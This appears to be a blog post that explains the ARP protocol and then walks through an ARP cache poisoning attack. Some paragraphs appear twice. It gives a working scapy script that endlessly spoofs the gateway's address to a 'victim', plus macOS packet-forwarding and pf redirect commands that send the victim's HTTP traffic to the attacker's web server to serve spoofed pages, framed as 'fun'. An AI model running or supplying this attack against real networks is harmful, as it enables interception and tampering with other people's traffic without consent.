ARP referrs to Address Resolution Protocol that is used to resolve Internet layer addresses (IP address) to link layer addresses (MAC address). Since the data transfer takes place below the link (or data link layer) every system needs to have the MAC address to be able to deliver a packet. So if I type https://google.com in my browser my request first needs to go to a gateway(usually a router) which then puts it out into the world. ARP is used to do this mapping between the IP address and the MAC address.
ARP is a stateless protocol. Network hosts usually cache the ARP replies they receive. These mappings can be seen in the arp table using
If I wanted to spoof an arp table entry I would just send you a malicious ARP request. Most likely you would already have an ARP table entry for this request so it would be flagged as a duplicate but most OS'es do not discard these duplicates. For example Linux ignores unsolicited replies, but on the other hand uses seen requests from other machines to update its cache. If you constantly bombard the victim with these ARP requests the ARP table would be poisoned. Here's a script that does that
It uses scapy as a dependency to create and send packets. Once you run the above script you can check the new spoofed entry in the victim's arp table using `arp -a`. Now all of the victim's traffic is going through your IP and since most likely you wouldn't have IP forwarding enabled the victim would be getting 404's.
To make it a bit more fun you can also enable IP forwarding and have some fun sending spoofed pages to the victim. For example you can do this.
ARP is a stateless protocol. Network hosts usually cache the ARP replies they receive. These mappings can be seen in the arp table using
>> arp -aThe protocol consists of a simple request and reply mechanism to associate IP's with MAC addresses. But sadly the protocol doesn't contain any method to authenticate these ARP packets. So if somebody sends you a fake ARP request you don't have any mechanism to confirm it's veracity.
If I wanted to spoof an arp table entry I would just send you a malicious ARP request. Most likely you would already have an ARP table entry for this request so it would be flagged as a duplicate but most OS'es do not discard these duplicates. For example Linux ignores unsolicited replies, but on the other hand uses seen requests from other machines to update its cache. If you constantly bombard the victim with these ARP requests the ARP table would be poisoned. Here's a script that does that
from scapy.all import *
import time
op = 1
victim_ip = ''; # victim
ip_to_spoof = ''; # gateway
attacker_mac = ''; # attacker's mac
arp = ARP(op=op, psrc=ip_to_spoof, pdst=victim_ip, hwdst=attacker_mac)
while True:
send(arp)
time.sleep(1)
It uses scapy as a dependency to create and send packets. Once you run the above script you can check the new spoofed entry in the victim's arp table using `arp -a`. Now all of the victim's traffic is going through your IP and since most likely you wouldn't have IP forwarding enabled the victim would be getting 404's.
To make it a bit more fun you can also enable IP forwarding and have some fun sending spoofed pages to the victim. For example you can do this.
# Enable packet forwarding on mac sudo sysctl -w net.inet.ip.forwarding=1 # Enable port forwarding on mac sudo pfctl -e # Add this line to your /etc/pf.conf after enabling port forwarding rdr on en0 inet proto tcp from $victim_ip to any port = 80 -> 127.0.0.1 # Reload PF configuration to apply the above filter sudo pfctl -f /etc/pf.confThe above line redirects all HTTP traffic to the attacker's HTTP WebServer.
No comments:
Post a Comment